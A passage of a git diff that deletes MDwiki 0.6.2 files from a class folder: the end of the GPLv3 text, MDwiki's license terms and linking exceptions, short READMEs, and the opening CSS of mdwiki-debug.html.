-11 of the WIPO copyright treaty adopted on 20 December 1996, or
-similar laws prohibiting or restricting circumvention of such
-measures.
-
-  When you convey a covered work, you waive any legal power to forbid
-circumvention of technological measures to the extent such circumvention
-is effected by exercising rights under this License with respect to
-the covered work, and you disclaim any intention to limit operation or
-modification of the work as a means of enforcing, against the work's
-users, your or third parties' legal rights to forbid circumvention of
-technological measures.
-
-  4. Conveying Verbatim Copies.
-
-  You may convey verbatim copies of the Program's source code as you
-receive it, in any medium, provided that you conspicuously and
-appropriately publish on each copy an appropriate copyright notice;
-keep intact all notices stating that this License and any
-non-permissive terms added in accord with section 7 apply to the code;
-keep intact all notices of the absence of any warranty; and give all
-recipients a copy of this License along with the Program.
-
-  You may charge any price or no price for each copy that you convey,
-and you may offer support or warranty protection for a fee.
-
-  5. Conveying Modified Source Versions.
-
-  You may convey a work based on the Program, or the modifications to
-produce it from the Program, in the form of source code under the
-terms of section 4, provided that you also meet all of these conditions:
-
-    a) The work must carry prominent notices stating that you modified
-    it, and giving a relevant date.
-
-    b) The work must carry prominent notices stating that it is
-    released under this License and any conditions added under section
-    7.  This requirement modifies the requirement in section 4 to
-    "keep intact all notices".
-
-    c) You must license the entire work, as a whole, under this
-    License to anyone who comes into possession of a copy.  This
-    License will therefore apply, along with any applicable section 7
-    additional terms, to the whole of the work, and all its parts,
-    regardless of how they are packaged.  This License gives no
-    permission to license the work in any other way, but it does not
-    invalidate such permission if you have separately received it.
-
-    d) If the work has interactive user interfaces, each must display
-    Appropriate Legal Notices; however, if the Program has interactive
-    interfaces that do not display Appropriate Legal Notices, your
-    work need not make them do so.
-
-  A compilation of a covered work with other separate and independent
-works, which are not by their nature extensions of the covered work,
-and which are not combined with it such as to form a larger program,
-in or on a volume of a storage or distribution medium, is called an
-"aggregate" if the compilation and its resulting copyright are not
-used to limit the access or legal rights of the compilation's users
-beyond what the individual works permit.  Inclusion of a covered work
-in an aggregate does not cause this License to apply to the other
-parts of the aggregate.
-
-  6. Conveying Non-Source Forms.
-
-  You may convey a covered work in object code form under the terms
-of sections 4 and 5, provided that you also convey the
-machine-readable Corresponding Source under the terms of this License,
-in one of these ways:
-
-    a) Convey the object code in, or embodied in, a physical product
-    (including a physical distribution medium), accompanied by the
-    Corresponding Source fixed on a durable physical medium
-    customarily used for software interchange.
-
-    b) Convey the object code in, or embodied in, a physical product
-    (including a physical distribution medium), accompanied by a
-    written offer, valid for at least three years and valid for as
-    long as you offer spare parts or customer support for that product
-    model, to give anyone who possesses the object code either (1) a
-    copy of the Corresponding Source for all the software in the
-    product that is covered by this License, on a durable physical
-    medium customarily used for software interchange, for a price no
-    more than your reasonable cost of physically performing this
-    conveying of source, or (2) access to copy the
-    Corresponding Source from a network server at no charge.
-
-    c) Convey individual copies of the object code with a copy of the
-    written offer to provide the Corresponding Source.  This
-    alternative is allowed only occasionally and noncommercially, and
-    only if you received the object code with such an offer, in accord
-    with subsection 6b.
-
-    d) Convey the object code by offering access from a designated
-    place (gratis or for a charge), and offer equivalent access to the
-    Corresponding Source in the same way through the same place at no
-    further charge.  You need not require recipients to copy the
-    Corresponding Source along with the object code.  If the place to
-    copy the object code is a network server, the Corresponding Source
-    may be on a different server (operated by you or a third party)
-    that supports equivalent copying facilities, provided you maintain
-    clear directions next to the object code saying where to find the
-    Corresponding Source.  Regardless of what server hosts the
-    Corresponding Source, you remain obligated to ensure that it is
-    available for as long as needed to satisfy these requirements.
-
-    e) Convey the object code using peer-to-peer transmission, provided
-    you inform other peers where the object code and Corresponding
-    Source of the work are being offered to the general public at no
-    charge under subsection 6d.
-
-  A separable portion of the object code, whose source code is excluded
-from the Corresponding Source as a System Library, need not be
-included in conveying the object code work.
-
-  A "User Product" is either (1) a "consumer product", which means any
-tangible personal property which is normally used for personal, family,
-or household purposes, or (2) anything designed or sold for incorporation
-into a dwelling.  In determining whether a product is a consumer product,
-doubtful cases shall be resolved in favor of coverage.  For a particular
-product received by a particular user, "normally used" refers to a
-typical or common use of that class of product, regardless of the status
-of the particular user or of the way in which the particular user
-actually uses, or expects or is expected to use, the product.  A product
-is a consumer product regardless of whether the product has substantial
-commercial, industrial or non-consumer uses, unless such uses represent
-the only significant mode of use of the product.
-
-  "Installation Information" for a User Product means any methods,
-procedures, authorization keys, or other information required to install
-and execute modified versions of a covered work in that User Product from
-a modified version of its Corresponding Source.  The information must
-suffice to ensure that the continued functioning of the modified object
-code is in no case prevented or interfered with solely because
-modification has been made.
-
-  If you convey an object code work under this section in, or with, or
-specifically for use in, a User Product, and the conveying occurs as
-part of a transaction in which the right of possession and use of the
-User Product is transferred to the recipient in perpetuity or for a
-fixed term (regardless of how the transaction is characterized), the
-Corresponding Source conveyed under this section must be accompanied
-by the Installation Information.  But this requirement does not apply
-if neither you nor any third party retains the ability to install
-modified object code on the User Product (for example, the work has
-been installed in ROM).
-
-  The requirement to provide Installation Information does not include a
-requirement to continue to provide support service, warranty, or updates
-for a work that has been modified or installed by the recipient, or for
-the User Product in which it has been modified or installed.  Access to a
-network may be denied when the modification itself materially and
-adversely affects the operation of the network or violates the rules and
-protocols for communication across the network.
-
-  Corresponding Source conveyed, and Installation Information provided,
-in accord with this section must be in a format that is publicly
-documented (and with an implementation available to the public in
-source code form), and must require no special password or key for
-unpacking, reading or copying.
-
-  7. Additional Terms.
-
-  "Additional permissions" are terms that supplement the terms of this
-License by making exceptions from one or more of its conditions.
-Additional permissions that are applicable to the entire Program shall
-be treated as though they were included in this License, to the extent
-that they are valid under applicable law.  If additional permissions
-apply only to part of the Program, that part may be used separately
-under those permissions, but the entire Program remains governed by
-this License without regard to the additional permissions.
-
-  When you convey a copy of a covered work, you may at your option
-remove any additional permissions from that copy, or from any part of
-it.  (Additional permissions may be written to require their own
-removal in certain cases when you modify the work.)  You may place
-additional permissions on material, added by you to a covered work,
-for which you have or can give appropriate copyright permission.
-
-  Notwithstanding any other provision of this License, for material you
-add to a covered work, you may (if authorized by the copyright holders of
-that material) supplement the terms of this License with terms:
-
-    a) Disclaiming warranty or limiting liability differently from the
-    terms of sections 15 and 16 of this License; or
-
-    b) Requiring preservation of specified reasonable legal notices or
-    author attributions in that material or in the Appropriate Legal
-    Notices displayed by works containing it; or
-
-    c) Prohibiting misrepresentation of the origin of that material, or
-    requiring that modified versions of such material be marked in
-    reasonable ways as different from the original version; or
-
-    d) Limiting the use for publicity purposes of names of licensors or
-    authors of the material; or
-
-    e) Declining to grant rights under trademark law for use of some
-    trade names, trademarks, or service marks; or
-
-    f) Requiring indemnification of licensors and authors of that
-    material by anyone who conveys the material (or modified versions of
-    it) with contractual assumptions of liability to the recipient, for
-    any liability that these contractual assumptions directly impose on
-    those licensors and authors.
-
-  All other non-permissive additional terms are considered "further
-restrictions" within the meaning of section 10.  If the Program as you
-received it, or any part of it, contains a notice stating that it is
-governed by this License along with a term that is a further
-restriction, you may remove that term.  If a license document contains
-a further restriction but permits relicensing or conveying under this
-License, you may add to a covered work material governed by the terms
-of that license document, provided that the further restriction does
-not survive such relicensing or conveying.
-
-  If you add terms to a covered work in accord with this section, you
-must place, in the relevant source files, a statement of the
-additional terms that apply to those files, or a notice indicating
-where to find the applicable terms.
-
-  Additional terms, permissive or non-permissive, may be stated in the
-form of a separately written license, or stated as exceptions;
-the above requirements apply either way.
-
-  8. Termination.
-
-  You may not propagate or modify a covered work except as expressly
-provided under this License.  Any attempt otherwise to propagate or
-modify it is void, and will automatically terminate your rights under
-this License (including any patent licenses granted under the third
-paragraph of section 11).
-
-  However, if you cease all violation of this License, then your
-license from a particular copyright holder is reinstated (a)
-provisionally, unless and until the copyright holder explicitly and
-finally terminates your license, and (b) permanently, if the copyright
-holder fails to notify you of the violation by some reasonable means
-prior to 60 days after the cessation.
-
-  Moreover, your license from a particular copyright holder is
-reinstated permanently if the copyright holder notifies you of the
-violation by some reasonable means, this is the first time you have
-received notice of violation of this License (for any work) from that
-copyright holder, and you cure the violation prior to 30 days after
-your receipt of the notice.
-
-  Termination of your rights under this section does not terminate the
-licenses of parties who have received copies or rights from you under
-this License.  If your rights have been terminated and not permanently
-reinstated, you do not qualify to receive new licenses for the same
-material under section 10.
-
-  9. Acceptance Not Required for Having Copies.
-
-  You are not required to accept this License in order to receive or
-run a copy of the Program.  Ancillary propagation of a covered work
-occurring solely as a consequence of using peer-to-peer transmission
-to receive a copy likewise does not require acceptance.  However,
-nothing other than this License grants you permission to propagate or
-modify any covered work.  These actions infringe copyright if you do
-not accept this License.  Therefore, by modifying or propagating a
-covered work, you indicate your acceptance of this License to do so.
-
-  10. Automatic Licensing of Downstream Recipients.
-
-  Each time you convey a covered work, the recipient automatically
-receives a license from the original licensors, to run, modify and
-propagate that work, subject to this License.  You are not responsible
-for enforcing compliance by third parties with this License.
-
-  An "entity transaction" is a transaction transferring control of an
-organization, or substantially all assets of one, or subdividing an
-organization, or merging organizations.  If propagation of a covered
-work results from an entity transaction, each party to that
-transaction who receives a copy of the work also receives whatever
-licenses to the work the party's predecessor in interest had or could
-give under the previous paragraph, plus a right to possession of the
-Corresponding Source of the work from the predecessor in interest, if
-the predecessor has it or can get it with reasonable efforts.
-
-  You may not impose any further restrictions on the exercise of the
-rights granted or affirmed under this License.  For example, you may
-not impose a license fee, royalty, or other charge for exercise of
-rights granted under this License, and you may not initiate litigation
-(including a cross-claim or counterclaim in a lawsuit) alleging that
-any patent claim is infringed by making, using, selling, offering for
-sale, or importing the Program or any portion of it.
-
-  11. Patents.
-
-  A "contributor" is a copyright holder who authorizes use under this
-License of the Program or a work on which the Program is based.  The
-work thus licensed is called the contributor's "contributor version".
-
-  A contributor's "essential patent claims" are all patent claims
-owned or controlled by the contributor, whether already acquired or
-hereafter acquired, that would be infringed by some manner, permitted
-by this License, of making, using, or selling its contributor version,
-but do not include claims that would be infringed only as a
-consequence of further modification of the contributor version.  For
-purposes of this definition, "control" includes the right to grant
-patent sublicenses in a manner consistent with the requirements of
-this License.
-
-  Each contributor grants you a non-exclusive, worldwide, royalty-free
-patent license under the contributor's essential patent claims, to
-make, use, sell, offer for sale, import and otherwise run, modify and
-propagate the contents of its contributor version.
-
-  In the following three paragraphs, a "patent license" is any express
-agreement or commitment, however denominated, not to enforce a patent
-(such as an express permission to practice a patent or covenant not to
-sue for patent infringement).  To "grant" such a patent license to a
-party means to make such an agreement or commitment not to enforce a
-patent against the party.
-
-  If you convey a covered work, knowingly relying on a patent license,
-and the Corresponding Source of the work is not available for anyone
-to copy, free of charge and under the terms of this License, through a
-publicly available network server or other readily accessible means,
-then you must either (1) cause the Corresponding Source to be so
-available, or (2) arrange to deprive yourself of the benefit of the
-patent license for this particular work, or (3) arrange, in a manner
-consistent with the requirements of this License, to extend the patent
-license to downstream recipients.  "Knowingly relying" means you have
-actual knowledge that, but for the patent license, your conveying the
-covered work in a country, or your recipient's use of the covered work
-in a country, would infringe one or more identifiable patents in that
-country that you have reason to believe are valid.
-
-  If, pursuant to or in connection with a single transaction or
-arrangement, you convey, or propagate by procuring conveyance of, a
-covered work, and grant a patent license to some of the parties
-receiving the covered work authorizing them to use, propagate, modify
-or convey a specific copy of the covered work, then the patent license
-you grant is automatically extended to all recipients of the covered
-work and works based on it.
-
-  A patent license is "discriminatory" if it does not include within
-the scope of its coverage, prohibits the exercise of, or is
-conditioned on the non-exercise of one or more of the rights that are
-specifically granted under this License.  You may not convey a covered
-work if you are a party to an arrangement with a third party that is
-in the business of distributing software, under which you make payment
-to the third party based on the extent of your activity of conveying
-the work, and under which the third party grants, to any of the
-parties who would receive the covered work from you, a discriminatory
-patent license (a) in connection with copies of the covered work
-conveyed by you (or copies made from those copies), or (b) primarily
-for and in connection with specific products or compilations that
-contain the covered work, unless you entered into that arrangement,
-or that patent license was granted, prior to 28 March 2007.
-
-  Nothing in this License shall be construed as excluding or limiting
-any implied license or other defenses to infringement that may
-otherwise be available to you under applicable patent law.
-
-  12. No Surrender of Others' Freedom.
-
-  If conditions are imposed on you (whether by court order, agreement or
-otherwise) that contradict the conditions of this License, they do not
-excuse you from the conditions of this License.  If you cannot convey a
-covered work so as to satisfy simultaneously your obligations under this
-License and any other pertinent obligations, then as a consequence you may
-not convey it at all.  For example, if you agree to terms that obligate you
-to collect a royalty for further conveying from those to whom you convey
-the Program, the only way you could satisfy both those terms and this
-License would be to refrain entirely from conveying the Program.
-
-  13. Use with the GNU Affero General Public License.
-
-  Notwithstanding any other provision of this License, you have
-permission to link or combine any covered work with a work licensed
-under version 3 of the GNU Affero General Public License into a single
-combined work, and to convey the resulting work.  The terms of this
-License will continue to apply to the part which is the covered work,
-but the special requirements of the GNU Affero General Public License,
-section 13, concerning interaction through a network will apply to the
-combination as such.
-
-  14. Revised Versions of this License.
-
-  The Free Software Foundation may publish revised and/or new versions of
-the GNU General Public License from time to time.  Such new versions will
-be similar in spirit to the present version, but may differ in detail to
-address new problems or concerns.
-
-  Each version is given a distinguishing version number.  If the
-Program specifies that a certain numbered version of the GNU General
-Public License "or any later version" applies to it, you have the
-option of following the terms and conditions either of that numbered
-version or of any later version published by the Free Software
-Foundation.  If the Program does not specify a version number of the
-GNU General Public License, you may choose any version ever published
-by the Free Software Foundation.
-
-  If the Program specifies that a proxy can decide which future
-versions of the GNU General Public License can be used, that proxy's
-public statement of acceptance of a version permanently authorizes you
-to choose that version for the Program.
-
-  Later license versions may give you additional or different
-permissions.  However, no additional obligations are imposed on any
-author or copyright holder as a result of your choosing to follow a
-later version.
-
-  15. Disclaimer of Warranty.
-
-  THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
-APPLICABLE LAW.  EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
-HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
-OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
-THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
-PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
-IS WITH YOU.  SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
-ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
-
-  16. Limitation of Liability.
-
-  IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
-WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
-THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
-GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
-USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
-DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
-PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
-EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
-SUCH DAMAGES.
-
-  17. Interpretation of Sections 15 and 16.
-
-  If the disclaimer of warranty and limitation of liability provided
-above cannot be given local legal effect according to their terms,
-reviewing courts shall apply local law that most closely approximates
-an absolute waiver of all civil liability in connection with the
-Program, unless a warranty or assumption of liability accompanies a
-copy of the Program in return for a fee.
-
-                     END OF TERMS AND CONDITIONS
-
-            How to Apply These Terms to Your New Programs
-
-  If you develop a new program, and you want it to be of the greatest
-possible use to the public, the best way to achieve this is to make it
-free software which everyone can redistribute and change under these terms.
-
-  To do so, attach the following notices to the program.  It is safest
-to attach them to the start of each source file to most effectively
-state the exclusion of warranty; and each file should have at least
-the "copyright" line and a pointer to where the full notice is found.
-
-    <one line to give the program's name and a brief idea of what it does.>
-    Copyright (C) <year>  <name of author>
-
-    This program is free software: you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation, either version 3 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program.  If not, see <http://www.gnu.org/licenses/>.
-
-Also add information on how to contact you by electronic and paper mail.
-
-  If the program does terminal interaction, make it output a short
-notice like this when it starts in an interactive mode:
-
-    <program>  Copyright (C) <year>  <name of author>
-    This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
-    This is free software, and you are welcome to redistribute it
-    under certain conditions; type `show c' for details.
-
-The hypothetical commands `show w' and `show c' should show the appropriate
-parts of the General Public License.  Of course, your program's commands
-might be different; for a GUI interface, you would use an "about box".
-
-  You should also get your employer (if you work as a programmer) or school,
-if any, to sign a "copyright disclaimer" for the program, if necessary.
-For more information on this, and how to apply and follow the GNU GPL, see
-<http://www.gnu.org/licenses/>.
-
-  The GNU General Public License does not permit incorporating your program
-into proprietary programs.  If your program is a subroutine library, you
-may consider it more useful to permit linking proprietary applications with
-the library.  If this is what you want to do, use the GNU Lesser General
-Public License instead of this License.  But first, please read
-<http://www.gnu.org/philosophy/why-not-lgpl.html>.
diff --git a/IntroClassFiles/mdwiki-0.6.2/LICENSE.txt b/IntroClassFiles/mdwiki-0.6.2/LICENSE.txt
deleted file mode 100755
index fe4f79ce..00000000
--- a/IntroClassFiles/mdwiki-0.6.2/LICENSE.txt
+++ /dev/null
@@ -1,48 +0,0 @@
-MDwiki is licensed under the terms of the GNU GPLv3 with additional terms and
-linking exceptions. The GPLv3 license text can be found in the GPLv3.txt file, the
-additional terms are given below this paragraph.
-
-Linking exceptions
-------------------
-
-In addition to the terms in the GPLv3 the following linking exceptions apply:
-
-The authors of this work grant the rights to dynamically link against the below
-listed external sources or binaries during runtime, as an exception to the terms of
-the GNU GPLv3, under the terms that none of that linked code shall be deemed part of
-this work, or a derivative work of this work, and as such are not required to meet
-the license terms of the GPLv3 and as such are not covered by the terms of the GPLv3
-when conveying this work.
-
-The full and exhaustive list of those sources excepted from the GPLv3 are:
-
-* The Google Maps API v3 located at: http://maps.google.com/maps/api/js
-* The twitter "follow button" widget located at http://platform.twitter.com/widgets.js
-* The GitHub Gist API located at http://gist.github.com/{id}.js. This applies only to
-  the javascript coded issues by GitHub Inc. and explicitly does not apply to the
-  content of any GitHub gist.
-* The disqus API located at http://<name>.disqus.com/embed.js where <name> is the
-  userid of the forum.
-
-
-Additional terms to GPLv3
--------------------------
-
-In compliance with section 7 of the GNU GPLv3 the following additional terms apply:
-
-a) The contained and displayed copyright attribution footer notice may not be removed,
-  modified, altered or styled, or being removed, modified, altered or styled by
-  external software (scripts, stylesheets, filters) in a way that would considerably
-  affect visibility or readability of the notice to the user or any third party that
-  uses the software locally or over the network; this especially includes resizing,
-  overlaying, hiding or similar techniques.
-
-b) You may adjust or style the copyright footer to suit the appearance or layout of
-  your website, as long as this does not violate the terms given in section (a)
-
-c) Attribution hyperlinks in the footer have to be kept unaltered.
-
-d) You may add your name to the list of copyright holder(s) in the footer if you make
-  changes to the work, keeping intact all other copyright holder names
-
-e) Changes to these terms require written permission by the copyright holder(s).
diff --git a/IntroClassFiles/mdwiki-0.6.2/LICENSE_1.txt b/IntroClassFiles/mdwiki-0.6.2/LICENSE_1.txt
deleted file mode 100755
index fe4f79ce..00000000
--- a/IntroClassFiles/mdwiki-0.6.2/LICENSE_1.txt
+++ /dev/null
@@ -1,48 +0,0 @@
-MDwiki is licensed under the terms of the GNU GPLv3 with additional terms and
-linking exceptions. The GPLv3 license text can be found in the GPLv3.txt file, the
-additional terms are given below this paragraph.
-
-Linking exceptions
-------------------
-
-In addition to the terms in the GPLv3 the following linking exceptions apply:
-
-The authors of this work grant the rights to dynamically link against the below
-listed external sources or binaries during runtime, as an exception to the terms of
-the GNU GPLv3, under the terms that none of that linked code shall be deemed part of
-this work, or a derivative work of this work, and as such are not required to meet
-the license terms of the GPLv3 and as such are not covered by the terms of the GPLv3
-when conveying this work.
-
-The full and exhaustive list of those sources excepted from the GPLv3 are:
-
-* The Google Maps API v3 located at: http://maps.google.com/maps/api/js
-* The twitter "follow button" widget located at http://platform.twitter.com/widgets.js
-* The GitHub Gist API located at http://gist.github.com/{id}.js. This applies only to
-  the javascript coded issues by GitHub Inc. and explicitly does not apply to the
-  content of any GitHub gist.
-* The disqus API located at http://<name>.disqus.com/embed.js where <name> is the
-  userid of the forum.
-
-
-Additional terms to GPLv3
--------------------------
-
-In compliance with section 7 of the GNU GPLv3 the following additional terms apply:
-
-a) The contained and displayed copyright attribution footer notice may not be removed,
-  modified, altered or styled, or being removed, modified, altered or styled by
-  external software (scripts, stylesheets, filters) in a way that would considerably
-  affect visibility or readability of the notice to the user or any third party that
-  uses the software locally or over the network; this especially includes resizing,
-  overlaying, hiding or similar techniques.
-
-b) You may adjust or style the copyright footer to suit the appearance or layout of
-  your website, as long as this does not violate the terms given in section (a)
-
-c) Attribution hyperlinks in the footer have to be kept unaltered.
-
-d) You may add your name to the list of copyright holder(s) in the footer if you make
-  changes to the work, keeping intact all other copyright holder names
-
-e) Changes to these terms require written permission by the copyright holder(s).
diff --git a/IntroClassFiles/mdwiki-0.6.2/README.md b/IntroClassFiles/mdwiki-0.6.2/README.md
deleted file mode 100755
index bfc7bbf2..00000000
--- a/IntroClassFiles/mdwiki-0.6.2/README.md
+++ /dev/null
@@ -1,4 +0,0 @@
-MDwiki
-======
-
-See http://www.mdwiki.info/ for more documentation and details.
diff --git a/IntroClassFiles/mdwiki-0.6.2/README_1.md b/IntroClassFiles/mdwiki-0.6.2/README_1.md
deleted file mode 100755
index bfc7bbf2..00000000
--- a/IntroClassFiles/mdwiki-0.6.2/README_1.md
+++ /dev/null
@@ -1,4 +0,0 @@
-MDwiki
-======
-
-See http://www.mdwiki.info/ for more documentation and details.
diff --git a/IntroClassFiles/mdwiki-0.6.2/mdwiki-debug.html b/IntroClassFiles/mdwiki-0.6.2/mdwiki-debug.html
deleted file mode 100755
index 7054fc9a..00000000
--- a/IntroClassFiles/mdwiki-0.6.2/mdwiki-debug.html
+++ /dev/null
@@ -1,4260 +0,0 @@
-<!DOCTYPE html>
-<html>
-<!--
-   This is MDwiki v0.6.2
-   (C) 2013 by Timo Dörr and contributors. This software is licensed
-   under the terms of the GNU GPLv3 with additional terms applied.
-   See https://github.com/Dynalon/mdwiki/blob/master/LICENSE.txt for more detail.
-   See http://github.com/Dynalon/mdwiki for a copy of the source code.
--->
-<head>
-    <title>MDwiki</title>
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <meta name="fragment" content="!">
-    <link rel="shortcut icon" type="image/x-icon" href="favicon.png" />
-    <meta charset="UTF-8">
-    <style type="text/css">
-    /* hide the main content while we assemble everything */
-    .md-hidden-load { display: none; }
-
-    .anchor-highlight {
-        font-size: 0.7em;
-        margin-left: 0.25em;
-    }
-    /* for pageContentMenu */
-    #md-page-menu {
-            position: static;
-    }
-    #md-page-menu a.active {
-        /* background-color: rgba(0, 0, 0, 0.01); */
-        font-weight: bold;
-        padding-left: 6px;
-
-    }
-    @media (min-width: 992px) {
-        #md-page-menu.affix {
-            position: fixed;
-        }
-    }
-    @media (min-width: 768px) {
-        .md-float-left .col-sm-8, .md-float-right .col-sm-8 {
-            max-width: 66.67%;
-        }
-        .md-float-left .col-sm-4, .md-float-right .col-sm-4  {
-            max-width: 33.33%;
-        }
-        .md-float-left .col-sm-2, .md-float-right .col-sm-2 {
-            max-width: 16.67%;
-        }
-
-    }
-    @media (max-width: 992px) {
-        a.forkmeongithub {
-            display: none;
-        }
-    }
-    @media (max-width: 768px) {
-        /* don't use floating for smaller screens */
-        .md-float-left .col-sm-8, .md-float-left .col-sm-4, .md-float-left .col-sm-2 {
-            width: 100%;
-            max-width: !important;
-            min-width: 100%;
-        }
-        .md-float-right .col-sm-8, .md-float-right .col-sm-4, .md-float-right .col-sm-2 {
-            width: 100%;
-            max-width: !important;
-            min-width: 100%;
-        }
-    }
-
-    .md-floatenv .md-text {
-        /* md-text is not of md-col-* but needs the spacing */
-        margin-left: 15px;
-        margin-right: 15px;
-    }
-
-    /* float images */
-    .md-float-left .col-sm-8, .md-float-left .col-sm-4, .md-float-left .col-sm-2 {
-        width: auto;
-    }
-    .md-float-right .col-sm-8, .md-float-right .col-sm-4, .md-float-right .col-sm-2 {
-        float: right !important;
-        width: auto;
-    }
-    #md-all .md-copyright-footer {
-        background-color: !important;
-        font-size: smaller;
-        padding: 1em;
-    }
-    </style>
-
-<!-- START extlib/css/highlight.github.css -->
-<style id="style:extlib/css/highlight.github.css">pre code{display:block;padding:.5em;color:#333;background:#f8f8ff}pre .comment,pre .template_comment,pre .diff .header,pre .javadoc{color:#998;font-style:italic}pre .keyword,pre .css .rule .keyword,pre .winutils,pre .javascript .title,pre .nginx .title,pre .subst,pre .request,pre .status{color:#333;font-weight:bold}pre .number,pre .hexcolor,pre .ruby .constant{color:#099}pre .string,pre .tag .value,pre .phpdoc,pre .tex .formula{color:#d14}pre .title,pre .id{color:#900;font-weight:bold}pre .javascript .title,pre .lisp .title,pre .clojure .title,pre .subst{font-weight:normal}pre .class .title,pre .haskell .type,pre .vhdl .literal,pre .tex .command{color:#458;font-weight:bold}pre .tag,pre .tag .title,pre .rules .property,pre .django .tag .keyword{color:#000080;font-weight:normal}pre .attribute,pre .variable,pre .lisp .body{color:#008080}pre .regexp{color:#009926}pre .class{color:#458;font-weight:bold}pre .symbol,pre .ruby .symbol .string,pre .lisp .keyword,pre .tex .special,pre .prompt{color:#990073}pre .built_in,pre .lisp .title,pre .clojure .built_in{color:#0086b3}pre .preprocessor,pre .pi,pre .doctype,pre .shebang,pre .cdata{color:#999;font-weight:bold}pre .deletion{background:#fdd}pre .addition{background:#dfd}pre .diff .change{background:#0086b3}pre .chunk{color:#aaa}</style><!-- END extlib/css/highlight.github.css -->
-<!-- START extlib/css/bootstrap-3.0.0.min.css -->
-<style id="style:extlib/css/bootstrap-3.0.0.min.css">/*!
- * Bootstrap v3.0.0
- *
- * Copyright 2013 Twitter, Inc
- * Licensed under the Apache License v2.0
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Designed and built with all the love in the world by @mdo and @fat.
- *//*! normalize.css v2.1.0 | MIT License | git.io/normalize */article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary{display:block}audio,canvas,video{display:inline-block}audio:not([controls]){display:none;height:0}[hidden]{display:none}html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}a:focus{outline:thin dotted}a:active,a:hover{outline:0}h1{margin:.67em 0;font-size:2em}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}dfn{font-style:italic}hr{height:0;-moz-box-sizing:content-box;box-sizing:content-box}mark{color:#000;background:#ff0}code,kbd,pre,samp{font-family:monospace,serif;font-size:1em}pre{white-space:pre-wrap}q{quotes:"\201C" "\201D" "\2018" "\2019"}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top:-0.5em}sub{bottom:-0.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:0}fieldset{padding:.35em .625em .75em;margin:0 2px;border:1px solid #c0c0c0}legend{padding:0;border:0}button,input,select,textarea{margin:0;font-family:inherit;font-size:100%}button,input{line-height:normal}button,select{text-transform:none}button,html input[type="button"],input[type="reset"],input[type="submit"]{cursor:pointer;-webkit-appearance:button}button[disabled],html input[disabled]{cursor:default}input[type="checkbox"],input[type="radio"]{padding:0;box-sizing:border-box}input[type="search"]{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-appearance:textfield}input[type="search"]::-webkit-search-cancel-button,input[type="search"]::-webkit-search-decoration{-webkit-appearance:none}button::-moz-focus-inner,input::-moz-focus-inner{padding:0;border:0}textarea{overflow:auto;vertical-align:top}table{border-collapse:collapse;border-spacing:0}@media print{*{color:#000!important;text-shadow:none!important;background:transparent!important;box-shadow:none!important}a,a:visited{text-decoration:underline}a[href]:after{content:" (" attr(href) ")"}abbr[title]:after{content:" (" attr(title) ")"}.ir a:after,a[href^="javascript:"]:after,a[href^="#"]:after{content:""}pre,blockquote{border:1px solid #999;page-break-inside:avoid}thead{display:table-header-group}tr,img{page-break-inside:avoid}img{max-width:100%!important}@page{margin:2cm .5cm}p,h2,h3{orphans:3;widows:3}h2,h3{page-break-after:avoid}.navbar{display:none}.table td,.table th{background-color:#fff!important}.btn>.caret,.dropup>.btn>.caret{border-top-color:#000!important}.label{border:1px solid #000}.table{border-collapse:collapse!important}.table-bordered th,.table-bordered td{border:1px solid #ddd!important}}*,*:before,*:after{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}html{font-size:62.5%;-webkit-tap-highlight-color:rgba(0,0,0,0)}body{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;line-height:1.428571429;color:#333;background-color:#fff}input,button,select,textarea{font-family:inherit;font-size:inherit;line-height:inherit}button,input,select[multiple],textarea{background-image:none}a{color:#428bca;text-decoration:none}a:hover,a:focus{color:#2a6496;text-decoration:underline}a:focus{outline:thin dotted #333;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}img{vertical-align:middle}.img-responsive{display:block;height:auto;max-width:100%}.img-rounded{border-radius:6px}.img-thumbnail{display:inline-block;height:auto;max-width:100%;padding:4px;line-height:1.428571429;background-color:#fff;border:1px solid #ddd;border-radius:4px;-webkit-transition:all .2s ease-in-out;transition:all .2s ease-in-out}.img-circle{border-radius:50%}hr{margin-top:20px;margin-bottom:20px;border:0;border-top:1px solid 